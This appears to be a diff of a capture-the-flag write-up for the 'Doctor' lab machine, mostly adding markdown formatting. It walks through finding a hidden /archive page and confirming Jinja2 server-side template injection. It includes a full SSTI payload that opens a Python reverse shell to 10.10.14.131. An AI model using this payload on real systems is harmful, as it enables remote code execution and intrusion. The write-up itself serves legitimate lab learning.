Doctor

 ===============================================================

-8. Try creating an account on "Doctor Secure Messaging" and find comment <!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->.
+8. Try creating an account on "Doctor Secure Messaging" and find comment `<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->`.

-9. I tested various approaches with the message posting functionality including Server Side Template Injection (SSTI) with Flask since Wappalyzer informed me the web framework was Flask.
-I then decided to check /archive after creating a post.
-Creating a post with a title and content of {{7*'7'}} produces 7777777, which shows this page is vulnerable to SSTI.
+9. I tested various approaches with the message posting functionality including [Server Side Template Injection (SSTI) with Flask](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2---basic-injection) since Wappalyzer informed me the web framework was Flask.
+I then decided to check `/archive` after creating a post.
+Creating a post with a title and content of `{{7*'7'}}` produces `7777777`, which shows this page is vulnerable to SSTI.

-10. Post the following in the title and content using the "New Message" function then visit /archive to get a reverse shell:
+10. Post the following in the title and content using the "New Message" function then visit `/archive` to get a reverse shell:

 <div data-gb-custom-block data-tag="for"><div data-gb-custom-block data-tag="if" data-0='warning'>{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.131\",3254));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\"]);'").read().zfill(417)}}</div></div>

-The above was obtained from swisskyrepo/PayloadsAllTheThings and changed to call /bin/bash instead of /bin/cat to print a flag.
+The above was obtained from [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) and changed to call `/bin/bash` instead of `/bin/cat` to print a flag.

-The /archive page is vulnerable as explained on this page. /archive routing code:
+The `/archive` page is vulnerable as explained [on this page](https://blog.nvisium.com/p263). `/archive` routing code:

 from flask import render_template, render_template_string, request, Blueprint